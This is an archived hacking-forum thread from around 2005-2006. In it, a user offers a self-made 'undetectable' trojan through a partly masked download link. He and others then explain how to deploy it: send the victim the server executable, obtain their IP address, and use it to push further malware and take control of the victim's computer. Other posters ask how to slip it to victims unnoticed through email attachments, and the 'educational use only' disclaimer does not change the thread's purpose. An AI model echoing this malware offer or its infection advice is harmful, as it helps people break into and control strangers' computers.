file access
Closed Thread
Page 1 of 2 12 LastLast
Results 1 to 15 of 41

Thread: Undetectable Trojan!

Hybrid View

  1. #1
    carlo Guest

    Exclamation Undetectable Trojan!

    After Creating a Telnet Trojan I advanced to crateing a normal UNDETECTABLE trojan. This is totaly imune to any av or firewall And you can get it from my sever [URL=http://cookielogger.t*5.com/Trojan.zip]here[/URL].

    PLease note that this is for educational use only and do not abuse this ot pass it of as your own.

    Thank you

    Carlo
    Last edited by carlo; 09-27-2005 at 01:14 PM.

  2. #2
    Join Date
    Sep 2005
    Posts
    7

    Trojan

    Carlo.....wasssa!?

    I have a question...do you have to send a file to the "victim"? If so...which one is it??

  3. #3
    carlo Guest

    yes

    yes you must send them th sever.exe

  4. #4
    Join Date
    Sep 2005
    Posts
    3
    I have a question let say "hypothetically" that you wanted to send this trojan to someones computer, and it definately got there... what exactly would be the prupose? I mean what does a trojan do exactly ? I'm not entirely sure what it does... ... I'm jsut wondering by the way...

    Also what are the implications of using said trojan, it can't infect the sender can it?

    And also, what is the worst possible thing you could do to someone who recieved a trojan from you, like damage wise, assuming they recieved it in an e-mail attachment....

  5. #5
    carlo Guest

    lol

    Lol dude just say it, it isnt like where going to judge you. This is a api trojan which only lets you send other files from your computer to his e.g a virus or a trojan hourse. If you sent him a trojan horse through it you can totaly take controll of his computer.

  6. #6
    Join Date
    May 2006
    Posts
    1

    hi.

    Quote Originally Posted by carlo
    Lol dude just say it, it isnt like where going to judge you. This is a api trojan which only lets you send other files from your computer to his e.g a virus or a trojan hourse. If you sent him a trojan horse through it you can totaly take controll of his computer.
    can you explain in alittle more detail to how you actually use this, i read the help guild but as most help guilds i come across its not much help. i know i might sound stupid but not everyone using this forums are intelligent, infact from half the posts i would rate 70 percent of them moronic. as you may rate me.. but anyways a little more info to how you can actually use this to send a trojan that wont be decected would be appreciated (do you have to attatch with a file? and if you do how do you do it... i would think you need to because just sending the trojan outright would bring attention and probably taken care of before it is even put into use) if you like to email or add my msn to speak of this more to a stupid kid that wants to learn more its [email]themiddleman*********@hotmail.com[/email]. thank you for your time and im sorry if you find my post a waste of yours...

  7. #7
    Join Date
    Sep 2005
    Posts
    4

    Its not working

    Downloaded it and getting an error message that says "Mswinsck.ocx or one of its dependencies is not correctly configured. What can i do?

  8. #8
    carlo Guest

    runetime

    Yeah you dont have the visual basic runetime files. You can download them from microsoft.com.

  9. #9
    Join Date
    Oct 2005
    Posts
    1
    of course u would have to have their IP address, correct?

  10. #10
    carlo Guest

    yeah

    yeah all trojans have to.

  11. #11
    Join Date
    Oct 2005
    Posts
    23
    so if you get their IP ady. and send them the Trojen then you can do anything with their files correct?

  12. #12
    Join Date
    Nov 2005
    Posts
    4

    Carlos

    Carlos the telnet zip and the Trojan zip is not functioning, the Trojan opens but he does not function? what to make, it needs another program to function...?




    Quote Originally Posted by carlo
    After Creating a Telnet Trojan I advanced to crateing a normal UNDETECTABLE trojan. This is totaly imune to any av or firewall And you can get it from my sever [URL=http://cookielogger.t*5.com/Trojan.zip]here[/URL].

    PLease note that this is for educational use only and do not abuse this ot pass it of as your own.

    Thank you

    Carlo

  13. #13
    MrMicrosoft Guest

    -=ty=-

    Thanks for the awsome trojan... Carlo. !

    Great work u son of a hacker!

  14. #14
    Join Date
    Nov 2005
    Posts
    4
    Carlos the Trojan zip is not functioning, I does not have the visual beginner's all-purpose symbolic instruction code, but the server he would have that to function, because I exactly tested in me... and nothing........ senão as I go to order server.exe and to ask for for vitima to install the visual beginner's all-purpose symbolic instruction code... rs

  15. #15
    Join Date
    Nov 2005
    Posts
    4
    It forgives the error in the writing I am using a translator... I am Brazilian

Closed Thread

Similar Threads

  1. I wrote an undetectable keylogger
    By pman in forum Viruses and Trojans
    Replies: 10
    Last Post: 02-08-2010, 09:27 PM
  2. how to create a detectable trojan undetectable?
    By humza in forum Viruses and Trojans
    Replies: 26
    Last Post: 07-26-2009, 06:10 AM
  3. Replies: 1
    Last Post: 07-23-2008, 03:38 PM
  4. Is ardamax undetectable?
    By shaf_9110 in forum Viruses and Trojans
    Replies: 12
    Last Post: 08-06-2007, 11:28 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts